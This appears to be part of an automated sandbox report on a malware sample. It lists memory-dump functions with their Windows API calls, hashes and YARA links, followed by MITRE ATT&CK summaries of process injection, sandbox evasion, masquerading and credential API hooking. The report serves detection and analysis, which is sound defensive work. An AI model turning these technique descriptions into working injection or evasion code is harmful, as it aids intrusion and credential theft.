Uniqueness Score: -1.00%

Function 04DD9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD9FEA

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d18ffb1adcf44d216d4bd0bc42028eebbee339d0b9a56111b79f7b83312901ca
Instruction ID: 5dcc11a2b3279a11cec2fad77fff0cc6f5ba4204c24ffecaf1e73e32c4ee7838
Opcode Fuzzy Hash: d18ffb1adcf44d216d4bd0bc42028eebbee339d0b9a56111b79f7b83312901ca
Instruction Fuzzy Hash: F490027131114506F110715B840472A001697D5285F51C411A4815568D8AD5D8D17162

Uniqueness

Uniqueness Score: -1.00%

Function 04DD9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD978A

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 25d32a441e35fc725d113060d30f1166e7e1dc6a26bd7fef1f454e9b1297cb42
Instruction ID: 90ec96d61eb8556bac5064223bc7d3840fed4ad15098a03254cb742dd2e47b3d
Opcode Fuzzy Hash: 25d32a441e35fc725d113060d30f1166e7e1dc6a26bd7fef1f454e9b1297cb42
Instruction Fuzzy Hash: 1590026921300106F180715B540862E001697D5286F91D415A4006568CCD55D8A96361

Uniqueness

Uniqueness Score: -1.00%

Function 04DD9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD971A

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8db805b000b04d0b9a2428b80ec8fee0a8c55c214178f9b9def4ae39bc302ad6
Instruction ID: 9e287b19dda046fad04702420e402b0f4789959db58e733f9ee6971648af6b9e
Opcode Fuzzy Hash: 8db805b000b04d0b9a2428b80ec8fee0a8c55c214178f9b9def4ae39bc302ad6
Instruction Fuzzy Hash: 7790027120100506F100759B540866A001697E4385F51D011A9015565ECAA5D8D17171

Uniqueness

Uniqueness Score: -1.00%

Function 04DD9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD984A

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ef26766a9e212d5ceed35609b7842cbb1b8a1be0397cda63f237749a0da4b078
Instruction ID: 5a7205bf5079bd9df12650d2d0ad5d78b59cfdc9c13b1690e4fc77227ab98398
Opcode Fuzzy Hash: ef26766a9e212d5ceed35609b7842cbb1b8a1be0397cda63f237749a0da4b078
Instruction Fuzzy Hash: 0F900261242042567545B15B440452B4017A7E42C5791C012A5405960C8966E896E661

Uniqueness

Uniqueness Score: -1.00%

Function 04DD9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD986A

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 06b3cfe411ef967649a26586a189461039c0edad29943f5a1e9d8e52e4f38c8d
Instruction ID: 31a1c455adf081b3863307081153b0e7a5b28938f7f5e2e9b9c770ce895f7f7c
Opcode Fuzzy Hash: 06b3cfe411ef967649a26586a189461039c0edad29943f5a1e9d8e52e4f38c8d
Instruction Fuzzy Hash: DF90027120100517F111715B450472B001A97D42C5F91C412A4415568D9A96D992B161

Uniqueness

Uniqueness Score: -1.00%

Function 04DD99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD99AA

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 89bb38126366a21e543c5db715a58945f6aadb32bb239a5970f6782aa39ed139
Instruction ID: c6381b8beb6e66166953bb02d9f9ab3384000cddcede5a9664ea9d1754dd2fb8
Opcode Fuzzy Hash: 89bb38126366a21e543c5db715a58945f6aadb32bb239a5970f6782aa39ed139
Instruction Fuzzy Hash: 809002A134100546F100715B4414B2A0016D7E5385F51C015E5055564D8A59DC927166

Uniqueness

Uniqueness Score: -1.00%

Function 04DD9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD991A

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fd5452d93aee0491065f9e89d760ded756ffa8ef6126539ac859edce93716272
Instruction ID: 9e1f1934eed98bc69577c9fa02c3fd0934745163e0491d32db21bc3c1312fb40
Opcode Fuzzy Hash: fd5452d93aee0491065f9e89d760ded756ffa8ef6126539ac859edce93716272
Instruction Fuzzy Hash: 7F9002B120100506F140715B440476A001697D4385F51C011A9055564E8A99DDD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 04DD9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD9A5A

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e764e6a16a44663c80fad53ab9a0e01d5386bbf41b9515fac83ecfd74c9f03e8
Instruction ID: a7a9cf5710089d6b1a4eb400f4d9d6c327eed5377575b428bd48c428a3c4d661
Opcode Fuzzy Hash: e764e6a16a44663c80fad53ab9a0e01d5386bbf41b9515fac83ecfd74c9f03e8
Instruction Fuzzy Hash: 0690026121180146F200756B4C14B2B001697D4387F51C115A4145564CCD55D8A16561

Uniqueness

Uniqueness Score: -1.00%

Function 02E2A062, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02E13AF8), ref: 02E2A09D

Strings

.z`, xrefs: 02E2A08C, 02E2A098

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 29f2b1a408e0df59c942af5740a4ae4979d3f097bcf690921309c43073f142a8
Instruction ID: a5c66418d3c48053c0a90ef9d585cd0c0af4c7bb6d1c2428400d7d0b873acccb
Opcode Fuzzy Hash: 29f2b1a408e0df59c942af5740a4ae4979d3f097bcf690921309c43073f142a8
Instruction Fuzzy Hash: C4F06DB5240218BFE718DF55DC89EE737ACEF44760F018659F959A7241C631E921CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 02E2A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02E13AF8), ref: 02E2A09D

Strings

.z`, xrefs: 02E2A08C, 02E2A098

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 1cb1ff9f168be603b4b1043d1a2e0a0d46cf9c7f6c3031f228800215a7e61c3a
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: DCE04FB12002186BD714DF59DC44EA777ADEF88750F018554FD0967341C630F914CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02E182F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02E1834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02E1836B

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction ID: 910bcb95dc69a743a16b729b4507c8fbecd15c3f8f8cc26f96a614b86f8e29a7
Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction Fuzzy Hash: 4E01A731AC02287BF720A6949C42FFF776C6B40B55F158129FF04BA1C0E6D46A0A4AF5

Uniqueness

Uniqueness Score: -1.00%

Function 02E2A0DE, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02E2A134

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 841b37a1d15f47bed87837623c2dff4b57ab37e420ee8e8fb02e0d2159560829
Instruction ID: d494bc68152284ebbb011f98fac4531af992ac1b22083b4a12df2c8a078c8ac4
Opcode Fuzzy Hash: 841b37a1d15f47bed87837623c2dff4b57ab37e420ee8e8fb02e0d2159560829
Instruction Fuzzy Hash: 2201AFB2200108BFCB54CF99DC80EEB77A9AF8C754F158258FA0DE7251C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E2A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02E2A134

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: e9cdba3db2226c240999bc932d93aa01abfe2677dd1bce9be0cd33fbf59850a2
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: EF0162B2214108BFCB54DF89DC80EEB77ADAF8C754F158258FA4DA7251D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E2A241, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02E1F1A2,02E1F1A2,?,00000000,?,?), ref: 02E2A200

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: bbc0302fce18166d6c211f8d51024d216f3fab59fd3d4246740f2e298f5ee8a5
Instruction ID: 6df13a796fa15b33e2409cbc7596dc79b5540711d809f95a40e6bf5bae3214a2
Opcode Fuzzy Hash: bbc0302fce18166d6c211f8d51024d216f3fab59fd3d4246740f2e298f5ee8a5
Instruction Fuzzy Hash: 27E092762502186BD710EB99EC48DEAB7ADEFC4270F05C055F90D97702D631E91486E0

Uniqueness

Uniqueness Score: -1.00%

Function 02E1F6D1, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02E18CF4,?), ref: 02E1F6CB

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c390dd077c64928212fd79b5be58ae75336d2b71e08dcd952f5f552d6f93b283
Instruction ID: f02075fac006a073f305cf691b8adb0063ce66a4a3c886827ec1ef7856206990
Opcode Fuzzy Hash: c390dd077c64928212fd79b5be58ae75336d2b71e08dcd952f5f552d6f93b283
Instruction Fuzzy Hash: C8E068B56D03042BEE16E9748C22B6636855777705F09B471F5899B6F3DA50F00181F5

Uniqueness

Uniqueness Score: -1.00%

Function 02E2A1C1, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02E1F1A2,02E1F1A2,?,00000000,?,?), ref: 02E2A200

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5089947e498e59412f451e2ba59195d36b36b08fbbdcf6fa4a95abc1fe96e67d
Instruction ID: 54a725cc617d70398d4a4db3e47d37dfc3b97204094d7c88d0d9566e1ff9e0e9
Opcode Fuzzy Hash: 5089947e498e59412f451e2ba59195d36b36b08fbbdcf6fa4a95abc1fe96e67d
Instruction Fuzzy Hash: F8F08C71640204AFCB10DF65CC81EEB7769EF89710F108168F949A7242DA31A916CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 02E1F697, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02E18CF4,?), ref: 02E1F6CB

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 96cbd8bb775e3861d11a4d457be8b620056fd8dfafe2ecde46b77aed93a513a2
Instruction ID: 3b7bbf6b313dc91fc034123b4d330e08770baa6cb05a2ea0e57941b66a0c42a3
Opcode Fuzzy Hash: 96cbd8bb775e3861d11a4d457be8b620056fd8dfafe2ecde46b77aed93a513a2
Instruction Fuzzy Hash: F6E02C727C030826EA14EAA49C22F2233889724B09F4880B8FA8EA63D3DC11E00240E4

Uniqueness

Uniqueness Score: -1.00%

Function 02E2A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02E24506,?,02E24C7F,02E24C7F,?,02E24506,?,?,?,?,?,00000000,00000000,?), ref: 02E2A05D

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 93a08fd41f108088355402f07a9b66d8fe020a399569b0c55411c37a2e152804
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 33E012B1200218ABDB14EF99DC80EA777ADEF88A50F118558BA096B241C630F9148AB0

Uniqueness

Uniqueness Score: -1.00%

Function 02E2A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02E1F1A2,02E1F1A2,?,00000000,?,?), ref: 02E2A200

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 159e09a18e95b4de773cc59cc3b22ab07f0d6f5be63503f489a34dfa4b34a03a
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 6BE01AB12002186BDB10DF49DC84EE737ADEF88650F018164BA0967241C930E8148BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02E1F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02E18CF4,?), ref: 02E1F6CB

Memory Dump Source

Source File: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Offset: 02E10000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: 8e6c1fac83e031c1ce24c0d6b825d0d494622eabb244a8f55bdcc5a495955de0
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: ABD05E716903043AE610EAA49C02F2632895B54A04F494064FA499A2C3D950E00045A5

Uniqueness

Uniqueness Score: -1.00%

Function 04DD967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04DD9694

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 53863ec3d3b126fcc2383d7772cd8240894b8fdee69050b690878f2a0f3bba5e
Instruction ID: e460581afd58ce0f326cdf51816c8339f0a17afa9dccca0d91e88634f931b490
Opcode Fuzzy Hash: 53863ec3d3b126fcc2383d7772cd8240894b8fdee69050b690878f2a0f3bba5e
Instruction Fuzzy Hash: E9B09BB19014C5C9F711E7714A0873B791177D4745F16C051D1020655A4779D4D1F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04E2FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04E2FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04DDCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04E25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04E25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04e2fdda
0x04e2fde2
0x04e2fde5
0x04e2fdec
0x04e2fdfa
0x04e2fdff
0x04e2fe0a
0x04e2fe0f
0x04e2fe17
0x04e2fe1e
0x04e2fe19
0x04e2fe19
0x04e2fe19
0x04e2fe20
0x04e2fe21
0x04e2fe22
0x04e2fe25
0x04e2fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04E2FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04E2FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04E2FE2B

Memory Dump Source

Source File: 0000000F.00000002.512446516.0000000004D70000.00000040.00000001.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000F.00000002.512765833.0000000004E8B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 1a862dd0e467a30103e5e1eba7987040d17fd125b3dfea5cb8ec9493503ae050
Instruction ID: bed4276105727c14f08fb803653f5e7ceab82671c38022f68645b0fcc87de63c
Opcode Fuzzy Hash: 1a862dd0e467a30103e5e1eba7987040d17fd125b3dfea5cb8ec9493503ae050
Instruction Fuzzy Hash: 4CF0F672240211BFE6212A45DD02F33BB6AEB44B30F140314F628561D1EAA2FC20D7F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

